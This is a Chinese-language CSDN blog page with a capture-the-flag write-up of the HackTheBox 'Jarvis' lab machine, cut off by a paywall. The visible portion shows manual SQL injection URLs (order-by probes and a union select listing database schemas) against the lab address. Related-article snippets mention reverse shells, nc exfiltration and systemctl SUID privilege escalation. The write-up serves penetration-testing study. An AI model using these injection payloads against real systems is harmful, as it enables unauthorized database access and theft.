hackthebox- Jarvis(考点:sql注入/mysql/systemct提权)不用sqlmap

最新推荐文章于 2024-07-15 11:11:09 发布
最新推荐文章于 2024-07-15 11:11:09 发布
阅读量547 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105521501
版权
本文介绍了在HackTheBox-Jarvis靶机上,不使用sqlmap而是通过手工SQL注入获取信息,并利用文件包含漏洞进一步提权的过程。首先,通过order by检测和手工注入获取账号密码,然后通过CMD shell进行操作。其次,利用文件包含漏洞寻找数据库配置文件,最终通过nc将信息传送到本地并使用systemctl进行提权。
摘要由CSDN通过智能技术生成

此靶机以及带注入的靶机,大多数人用的sqlmap。针对oscp,本文章未用sqlmap。
其实现实场景中用sqlmap的也不多,会封IP的,不会让你扫来扫去。
所以学习手工注入也很必要。
注入也不一定仅仅是注入,在手工注入里也可以利用文件包含漏洞。

nmap

在这里插入图片描述
很常规,一开始又没ssh密码,当然是从80网页开始搜集信息。以及dirbuster扫它
发现phpadmin,但是没密码,继续看80
在这里插入图片描述
发现换不同的房间,网址里的序号就变了一个。
像这种改一个展示的东西,网址里的数字序号就变了一个,这个就很可能存在sql注入。注入的知识,网上太多啦。。。

第一种方法,完整的手工注入全程

先order by看,然后发现7,接着找显示位,再依次找库,库里找表,表里找柱,最后得到账号和密码

http://10.10.10.143/room.php?cod=1 order by 7
http://10.10.10.143/room.php?cod=1 order by 8
http://10.10.10.143/room.php?cod=-1 union all select 1,2,3,4,5,6,7
http://10.10.10.143/room.php?cod=-1 union all select 1,group_concat(schema_name),3,4,5,6,7
最低0.47元/天 解锁文章
冬萍子
关注
hackthebox-cronos(考点:dns/sql注入/crontab)
冬萍子癸水
04-11 380
nmap 看到53端口就应该想到dns,在/etc/hosts/里加上10.10.10.13 cronos.htb 然后再打开80,进入 cronos.htb。看看网页。以及dirbuster扫,但都没什么有价值的信息。 没啥突破口啊。继续信息搜集。 看来针对端口53,还要再利用 dig axfr @10.10.10.13 cronos.htb host -l cronos.htb 10.10...
Hackthebox-Jarvis (Machine Maker: manulqwerty & Ghostpp7)
weixin_43202322的博客
09-19 757
目录前言0x00 注入注入0x01提权总结 前言 IP: 10.10.10.143 友好的盒子 0x00 注入注入 在web页面逛逛,在预定房间页面, url: “http://10.10.10.143/room.php?cod=2” 这不测试一下注入枉自为人了,很快可以发现这是个完全没有过滤的数字型注入: payload: “2 and sleep(5)” 成功延时,那还有啥好说...
Hack the box靶机 Jarvis
菜浪马废的博客
05-23 308
sql注入 查看到是7列 2345位置是有回显的 说实话我今天有点累了 好想用sqlmap啊 DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 imissyou 看到一个.py脚本 执行ping命令 有了user的权限 什么也看不见 nc一下 ...
Hack The Box】linux练习-- Jarvis
人间体佐菲的博客
11-21 360
Hack The Box】linux练习-- Jarvis
sql注入---hack the box
m0_56010012的博客
04-18 2837
SQL 服务通常如何运行的一个很好的例子是用于任何用户的登录过程。每次用户想要登录时,Web 应用程序都会发送登录页面输入(用户名/密码组合)到 SQL 服务,将其与为该特定用户存储的数据库条目进行比较。假设指定的用户名和密码匹配数据库中的任何条目。在这种情况下,SQL 服务会将其报告给 Web 应用程序,然后 Web 应用程序将登录用户,让他们访问网站的受限部分。登录后,Web 应用程序将以 cookie 或身份验证令牌的形式为用户设置特殊权限,将他的在线状态与他在网站上经过身份验证的状态相关联。此 co
hackthebox-bankrobber(考点:xss/xsrf/端口转发/缓冲区溢出)
冬萍子癸水
04-18 758
nmap PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4) | http-methods: |_ Supported Methods: HEAD POST |_http-server-header: Apac...
arya-jarvis::hammer_and_wrench:旨在节省开发人员更多的时间和精力。 https:www.jeffjade.com
02-04
艾莉亚·贾维斯(ARYA JARVIS) 旨在节省开发人员更多的时间和精力。 English | 目标与理念 理想的目标是帮助我们以最简单的方式处理更精确的事情。 Arya Jarvis尝试这样做,它旨在节省开发人员更多的时间和精力。 ...
node-jarvis:Node-Jarvis
07-14
节点jarvis 受到cranklin 的php Jarvis 项目的启发, //cranklin.wordpress.com/2012/01/13/building-my-own-siri-jarvis/。 该项目将使用 node.js 作为控制台式 Jarvis 应用程序,或作为 Web 服务器为网络提供...
贝岭的matlab的代码-jarvis-calendar:贾维斯日历
06-16
Jarvis: Je regarde. Jarvis: Vos 3 prochains événements sont : Jarvis: Aujoud'hui à 19 heure, Repas chez la belle-mère. Jarvis: ... You: Ajoute-moi un événement Jarvis: Oui bien sûr, quel est le...
靶机渗透_hackthebox__jarvis -7
qq_34717555的博客
11-11 628
目标IP:10.10.10.143 Nmap scan report for supersecurehotel.htb (10.10.10.143) Host is up (0.28s latency). Not shown: 939 closed ports, 58 filtered ports PORT STATE SERVICE VERSION 22/tcp open ss...
cloud-config-toolbox-ui:dCloud协作工具箱页面,用于管理像Cisco Answers这样的云演示配置
02-24
cloud-config-toolbox-ui dCloud Colud Configuration Web门户UI项目。 它使用Webpack 4在Vue.js 2.6(包括vue-router和vuex)上构建。 发展 用法 yarn以安装依赖项软件包yarn start构建库并使用热重载yarn build:test开始开发环境yarn build:test以构建生产文件并启动快速Web服务器以测试生产文件vue-devtools以启动Vue.js开发人员工具电子应用程序。 您将需要在全球范围内单独安装此工具,但是一旦可用,您就可以使用此命令行来监视Vue应用程序的状态和DOM详细信息。 此脚本仅在开发模式下添加到index.html。 智威汤逊 开发网站上的登录功能将提示您输入JWT,因为它无法重定向您真正的SSO提供程序。 您可以通过访问并登录,然后打开浏览器JavaScrip
Hackthebox Shared 利用cookie进行sql注入,Redis沙盒逃逸漏洞提权
Ba1_Ma0的博客
11-11 1336
这个漏洞允许一个用户以另一个用户身份运行代码,我们可以执行cat命令,查看dan_smith用户的ssh密钥,之后ssh登录就好了。成功得到dan_smith用户的密钥,在kali上创建一个名为id_rsa的文件,设置权限为600,将密钥复制进去。我们可以创建一个文件,里面是我们的反向shell,然后让程序执行这个文件,就能拿到root权限了。成功获得dan_smith用户的权限,在查看用户时,发现了一个奇怪的组。找到一个有suid权限的程序,他是root用户创建的,但是我们可以执行。
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
技术分享
07-24 1523
Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程
kb-vuln3(systemctl提权
m0_66299232的博客
10-23 919
6.因为systemctl有suid权限,所以可以创建一个systemctl service,里面写入反弹shell的命令,通过软链接,将创建的服务嵌入他的服务中,即可反弹shell。9.执行systemctl link /tmp/test.service,发现没有这个目录,这是因为service这个命令跟tmp目录的权限有差异。systemctl link /dev/shm/test.service //服务创建成功,下面提示软链接创建成功。攻击机系统:kali linux 2021.1。
No.165-HackTheBox-Linux-Jarvis-Walkthrough渗透学习
qq_34801745的博客
07-18 279
** HackTheBox-Linux-Jarvis-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/194 靶机难度:中级(4.7/10) 靶机发布日期:2019年9月9日 靶机描述: Jarvis is a medium difficulty Linux box running a web server, which has DoS and brute force protection enabled. A page
OSCP-2-7-oscp(systemctl开机启动提权提权
墨痕诉清风的博客
08-21 146
脚本是以 root 身份运行的。由于脚本位于 oscp 用户目录中,我们可以重命名当前脚本并创建我们自己的以 root 身份运行的脚本。所以第一步是列出该目录中的所有文件。你可以看到 ip 脚本位于 oscp 主目录中。它归根用户所有,但我们有能力阅读它。要查看它是如何调用的,我们可以运行 grep 搜索。再重新启动一次,该标志将位于 oscp 主目录中并归 oscp 所有。由于不存在任何用户信息,我们知道。服务以了解它是如何被调用的。打开robots.txt。打开secret.txt。
Tryhackme - Vulnversity (考点:上传 & burp intruder & systemctl提权
冬萍子癸水
05-25 736
1 扫描 21想到进去找文件,22可能有ssh登录,139 445 去smb找文件,3128可能有代理转发,3333是http web进去搜集信息 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |
systemctl--设置suid位如何权限提升
最新发布
weixin_63350104的博客
07-15 119
python3上传文件到简易服务器。切换当前目录到/tmp。
hackthebox Sau靶场通关记录 | request baskets漏洞 | maltrail漏洞 | systemctl提权
zrk3034197094的博客
07-19 2757
hackthebox靶场Sau,request basketsSSRF漏洞,maltrail漏洞远程命令执行,systemctl sudo提权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值